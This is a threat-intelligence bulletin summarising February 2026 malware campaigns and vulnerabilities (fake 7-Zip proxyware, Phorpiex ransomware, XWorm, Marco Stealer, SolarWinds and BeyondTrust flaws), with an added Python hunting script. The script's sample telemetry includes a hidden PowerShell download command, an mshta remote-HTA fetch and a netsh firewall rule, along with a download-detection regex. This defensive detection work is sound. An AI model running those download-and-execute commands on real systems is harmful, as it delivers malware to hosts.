TIGR Threat Watch

Threat Watch Feed

🚩 – IOCs Added

The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.

🚩 Fake 7-Zip Download Sites Deliver Trojanized Installers that Enroll Windows Systems into Residential Proxy Networks

Malwarebytes reported on February 9, 2026, a malware campaign abusing lookalike domains impersonating the legitimate 7-Zip project to distribute trojanized installers. The activity centers on the domain 7zip[.]com, which is frequently mistaken for the legitimate http://7-zip[.]org site, and has been observed infecting consumer Windows systems for extended periods before detection. The malicious installer delivers a functional copy of 7-Zip alongside a concealed proxyware payload. During installation, additional binaries are dropped into C:\Windows\SysWOW64\hero\ and registered as Windows services running with SYSTEM privileges. The malware modifies firewall rules, profiles host hardware and network characteristics, and communicates with external infrastructure to enroll the victim system as a residential proxy node. Exploitation does not rely on a software vulnerability; instead, it abuses user trust and brand impersonation. The primary behavior is confirmed proxy monetization rather than traditional backdoor control.

Impact: Compromised systems are covertly repurposed as residential proxy nodes, allowing third parties to route traffic through the victim’s IP address. This can expose users and organizations to legal, reputational, and security risk if their systems are used for fraud, scraping, or other abusive activity. SYSTEM-level persistence, firewall rule manipulation, and encrypted communications increase dwell time and complicate detection and remediation.

Recommendation: Any system that has executed installers from 7zip[.]com should be treated as potentially compromised. Verify that 7-Zip is obtained only from the official http://7-zip[.]org domain and remove unauthorized Windows services or firewall rules associated with unexpected binaries under SysWOW64. Monitor endpoints for new auto-start services, netsh-based firewall changes, and outbound connections to known proxy infrastructure. Block identified command-and-control domains at the network perimeter.

🚩 Phorpiex phishing campaign uses LNK attachments to deliver GLOBAL GROUP ransomware

Forcepoint X-Labs reported a high-volume phishing campaign observed in early February 2026 that leveraged the Phorpiex botnet to deliver GLOBAL GROUP ransomware. The activity was documented on February 9, 2026, and relies on mass-distributed phishing emails with the subject “Your Document,” a lure commonly used at scale in 2024–2025. The infection chain begins with a weaponized Windows Shortcut (.lnk) attachment disguised as a document using double extensions and legitimate icons. When opened, the shortcut launches cmd.exe, which invokes PowerShell to download and execute a secondary payload. Phorpiex acts as the initial delivery mechanism, ultimately deploying GLOBAL GROUP ransomware, which operates fully offline and encrypts files locally without contacting command-and-control infrastructure.

Impact: This campaign demonstrates a low-noise ransomware delivery chain that minimizes network indicators and shortens detection windows. GLOBAL GROUP’s offline execution model, local key generation, and artifact cleanup increase the likelihood of successful encryption while complicating detection and recovery. Organizations relying primarily on network-based monitoring may have limited visibility into this activity until encryption has already occurred.

Recommendation: Configure email security to block or quarantine Windows shortcut (.lnk) attachments from external senders. Configure endpoint policies to restrict, or at least closely monitor, execution of shortcuts that spawn cmd.exe or PowerShell. Finally, ensure backups are offline or immutable and are tested regularly.

🚩 FortiGuard Labs Reports XWorm RAT Campaign Delivered via Themed Phishing Emails and Malicious Excel Attachments Exploiting CVE-2018-0802

In a report published February 10, 2026, Fortinet FortiGuard Labs described a multi-stage phishing campaign delivering a new variant of the XWorm remote access trojan (RAT). The activity targets Windows users and uses a range of business-themed phishing emails written in several languages, each carrying a malicious Excel add-in attachment (.XLAM). FortiGuard notes XWorm is an actively distributed RAT (including via Telegram-based marketplaces) and assesses the campaign impact as full remote control of the victim’s computer. In this chain, opening the crafted Excel attachment triggers exploitation of CVE-2018-0802 in Microsoft Equation Editor via a malformed embedded OLE object. The resulting shellcode downloads and executes an HTA file, which runs PowerShell to retrieve a JPEG that contains a transformed .NET module embedded between markers. The .NET module is loaded filelessly into memory and uses process hollowing to inject and execute the XWorm payload inside a newly created Msbuild.exe process. FortiGuard observed XWorm establishing AES-encrypted communications to its C2 and supporting extensive control commands and a plugin architecture.

Impact: If a user executes the malicious attachment on a vulnerable host, attackers can gain interactive remote control and deploy additional capabilities supported by XWorm, including data theft, system manipulation, and other attacker-directed actions via commands and plugins. The campaign’s use of fileless loading and process hollowing can reduce visibility for controls that rely heavily on on-disk artifacts, increasing the likelihood of successful post-compromise activity on affected Windows endpoints.

Recommendation: Patch and validate coverage for CVE-2018-0802 and ensure Microsoft Equation Editor-related legacy components are not exploitable in your environment. Block or quarantine Excel add-ins (.XLAM) and HTA execution from email and web-delivered content where feasible, and restrict mshta.exe and PowerShell to approved administrative contexts. Monitor or hunt for suspicious process chains consistent with this campaign, including Office or Equation Editor spawning mshta.exe, PowerShell download activity, and creation of suspended Msbuild.exe followed by memory injection behaviors.
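The hunting recommendations in the 7-Zip, Phorpiex and XWorm items above share a common shape: look for a specific parent/child process pair, a download command line, or a service or firewall change tied to an unexpected binary. The script below is an added example, not code from this bulletin or from Malwarebytes, Forcepoint or FortiGuard. It runs those checks over a constructed set of Sysmon-style process-creation and service-install records; the record field names (`type`, `image`, `parent`, `cmdline`, `image_path`) are assumptions, and every host, URL, PID and service name in the sample telemetry is made up. The `C:\Windows\SysWOW64\hero\` path is the one named in the 7-Zip item.

```python
"""Hunt constructed Windows telemetry for the process chains and persistence
described in the 7-Zip, Phorpiex and XWorm items.

Added example; not the bulletin's or any vendor's code. Field names and all
sample values are assumptions constructed for the demonstration.
"""
import json
import re
from dataclasses import dataclass
from typing import List

# Constructed sample telemetry, one JSON record per line. PIDs, URLs and the
# service name are made up; only the SysWOW64\hero path comes from the bulletin.
SAMPLE_TELEMETRY = r"""
{"type":"process","pid":4100,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmdline":"powershell -w hidden -c iwr http://stage.example.invalid/a -OutFile a.exe"}
{"type":"process","pid":4212,"image":"C:\\Windows\\System32\\mshta.exe","parent":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","cmdline":"mshta http://stage.example.invalid/p.hta"}
{"type":"process","pid":4300,"image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","parent":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"MSBuild.exe"}
{"type":"process","pid":4410,"image":"C:\\Windows\\System32\\netsh.exe","parent":"C:\\Windows\\SysWOW64\\hero\\setup.exe","cmdline":"netsh advfirewall firewall add rule name=hero dir=in action=allow program=C:\\Windows\\SysWOW64\\hero\\node.exe"}
{"type":"service","name":"HeroNode","image_path":"C:\\Windows\\SysWOW64\\hero\\node.exe","account":"LocalSystem"}
{"type":"process","pid":5000,"image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","parent":"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\devenv.exe","cmdline":"MSBuild.exe proj.sln"}
{"type":"process","pid":5100,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Windows\\explorer.exe","cmdline":"powershell Get-Process"}
"""

POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Office hosts plus the legacy Equation Editor binary named in the XWorm item.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
# Parents that should not normally launch MSBuild.exe (build tools like devenv.exe are fine).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"} | POWERSHELL
HERO_DIR = "\\syswow64\\hero\\"
# Common PowerShell download-and-execute primitives.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    rule: str
    key: str      # PID for process records, service name for service records
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> List[Finding]:
    """Apply the parent/child and command-line rules to one process record."""
    image, parent = basename(ev["image"]), basename(ev.get("parent", ""))
    cmd = ev.get("cmdline", "")
    key = str(ev["pid"])
    out: List[Finding] = []
    # Phorpiex LNK chain: cmd.exe -> PowerShell that downloads a payload.
    if image in POWERSHELL and parent == "cmd.exe" and DOWNLOAD_RE.search(cmd):
        out.append(Finding("cmd_powershell_download", key, cmd))
    # XWorm chain: Office / Equation Editor spawning mshta.exe.
    if image == "mshta.exe" and parent in OFFICE_PARENTS:
        out.append(Finding("office_spawns_mshta", key, f"{parent} -> mshta.exe"))
    # XWorm chain: MSBuild.exe created by a script host rather than build tooling.
    if image == "msbuild.exe" and parent in SCRIPT_HOSTS:
        out.append(Finding("script_host_spawns_msbuild", key, f"{parent} -> msbuild.exe"))
    # 7-Zip proxyware: firewall rule added via netsh.
    lowered = cmd.lower()
    if image == "netsh.exe" and "advfirewall" in lowered and "add rule" in lowered:
        out.append(Finding("netsh_firewall_rule_added", key, cmd))
    # 7-Zip proxyware: anything running from, or launched by, SysWOW64\hero.
    for path in (ev["image"], ev.get("parent", "")):
        if HERO_DIR in path.lower():
            out.append(Finding("syswow64_hero_binary", key, path))
            break
    return out


def check_service(ev: dict) -> List[Finding]:
    """Flag service installs whose binary lives under SysWOW64\\hero."""
    path = ev.get("image_path", "")
    if HERO_DIR in path.lower():
        return [Finding("service_from_syswow64_hero", ev["name"], path)]
    return []


def hunt(telemetry: str) -> List[Finding]:
    """Run every rule over newline-delimited JSON records and collect findings."""
    findings: List[Finding] = []
    for line in telemetry.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["type"] == "process":
            findings.extend(check_process(ev))
        elif ev["type"] == "service":
            findings.extend(check_service(ev))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_TELEMETRY):
        print(f"[{f.rule}] {f.key}: {f.detail}")
```

On the sample data, the benign records (MSBuild.exe launched by devenv.exe, PowerShell launched from Explorer without a download command) produce no findings, while each malicious record trips the rule for its campaign; the netsh record also trips the SysWOW64\hero rule because its parent runs from that directory. In production the same logic would be expressed as EDR or SIEM queries over real process-creation and service-install events rather than over an inline string.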

🚩 Marco Stealer Info-stealer Targets Browsers, Crypto Wallets, and Cloud Data with Encrypted C2 and Anti-analysis Techniques

Zscaler ThreatLabz disclosed technical analysis of a newly identified information stealer dubbed Marco Stealer, first observed in the wild in June 2025. The malware is designed to exfiltrate browser data, cryptocurrency wallet information, clipboard contents, screenshots, and sensitive files stored locally and in cloud-synced directories such as Google Drive and Dropbox. Marco Stealer is delivered via a downloader that executes PowerShell to retrieve the payload over HTTP. Once executed, the malware performs extensive host profiling, employs encrypted strings and runtime decryption to evade static analysis, terminates common security and analysis tools, and encrypts stolen data using AES-256 before exfiltration via HTTP POST requests. Command-and-control communication is confirmed and operational, and the malware includes dedicated components for browser data decryption, named-pipe–based data collection, and credential harvesting from numerous applications and services.

Impact: Successful infection can result in theft of credentials, browser session data, cryptocurrency wallet material, cloud-stored documents, and other sensitive information, enabling account takeover, financial loss, and follow-on intrusion activity. Marco Stealer’s focus on anti-analysis, encrypted C2, and broad application coverage increases the likelihood of data loss before detection, particularly in environments without strong endpoint behavioral monitoring.

Recommendation: Restrict execution of unsigned or unexpected PowerShell download-and-execute activity and monitor for abnormal PowerShell command lines originating from user contexts. Enforce endpoint protections that detect process termination of security tools, suspicious browser process manipulation, and named pipe abuse. Limit user access to cryptocurrency wallets and sensitive cloud-synced directories on corporate endpoints, and ensure credential reuse is minimized through MFA enforcement and password rotation where compromise is suspected.

Active Exploitation of Internet-exposed SolarWinds Web Help Desk Enables Lateral Movement and Domain Compromise

Microsoft reported active, in-the-wild exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances. The activity targeted organizations running unpatched or exposed WHD deployments and resulted in attacker footholds that progressed toward high-value assets, including domain controllers. Initial access was achieved through exploitation of WHD vulnerabilities, but Microsoft has not confirmed which specific CVE was used. Affected systems were vulnerable to both newly disclosed January 2026 issues, including CVE-2025-40551 and CVE-2025-40536, and earlier vulnerabilities such as CVE-2025-26399. Successful exploitation enabled unauthenticated remote code execution, after which attackers relied on living-off-the-land techniques, legitimate administrative tooling, and low-noise persistence. Observed post-exploitation activity included PowerShell and BITS-based payload delivery, deployment of legitimate RMM tooling for interactive access, reverse SSH and RDP persistence, DLL sideloading for credential access, and escalation to DCSync in at least one environment.

Impact: This activity demonstrates how a single exposed service management application can lead to full domain compromise when vulnerabilities are unpatched or insufficiently monitored. Attackers were able to blend into normal administrative activity, evade detection, and escalate privileges using legitimate tools, increasing the likelihood of prolonged access, credential theft, and widespread organizational impact.

Recommendation: Organizations using SolarWinds Web Help Desk should review the source material and assess exposure. Patch affected WHD deployments for CVE-2025-40551, CVE-2025-40536, and CVE-2025-26399 as applicable, and remove or restrict internet exposure of WHD services and administrative interfaces. Verify WHD servers are not unnecessarily accessible from untrusted networks, and use the hunting queries provided in the source material to search for the post-exploitation activity described above.

BeyondTrust RS and PRA pre-auth RCE (CVE-2026-1731) allows unauthenticated OS command execution as the site user

BeyondTrust disclosed a critical pre-authentication remote code execution vulnerability in BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA), tracked as CVE-2026-1731, with an advisory issued February 6, 2026, and updated February 10, 2026. The flaw is described as an OS command injection (CWE-78) with a CVSS v4 score of 9.9, impacting RS 25.3.1 and prior and PRA 24.3.4 and prior. BeyondTrust states it is not aware of any customers having been exploited at the time of disclosure. The vulnerability can be triggered via specially crafted client requests and requires no authentication or user interaction. Successful exploitation may allow an unauthenticated remote attacker to execute operating system commands in the context of the site user, which BeyondTrust notes can lead to system compromise, including unauthorized access, data exfiltration, and service disruption. BeyondTrust reports SaaS customers were patched as of February 2, 2026; self-hosted customers must apply the relevant patch or upgrade to a fixed version.

Impact: With this being a pre-authentication RCE in remote access infrastructure, any internet-exposed RS or affected PRA deployment presents a high-risk entry point. If exploited, attackers may gain code execution within the appliance context as the site user, which can enable rapid compromise and follow-on activity depending on the environment and integrations.

Recommendation: Organizations using BeyondTrust Remote Support or Privileged Remote Access should review the source material and assess exposure. Confirm whether you are SaaS-hosted or self-hosted and verify patch status. For self-hosted deployments, apply Patch BT26-02-RS (RS v21.3–25.3.1) or Patch BT26-02-PRA (PRA v22.1–24.x) or upgrade to a fixed release where applicable. Prioritize patching any internet-facing RS/PRA instances first and ensure appliances are not unnecessarily exposed to untrusted networks. If running RS older than 21.3 or PRA older than 22.1, complete the required version upgrade so the patch can be applied.


Follow on Twitter

@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.

Subscribe to the RSS

Just copy and add this link to your RSS app and be notified immediately when new intel is posted.

How to use RSS

Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.

To follow using Outlook:

  • In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
  • In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed


Popular mobile RSS reader apps include:

  • Feedly
  • NewsBlur
  • RSS Reader
  • Inoreader

After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed


About TIGR Threat Watch

Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.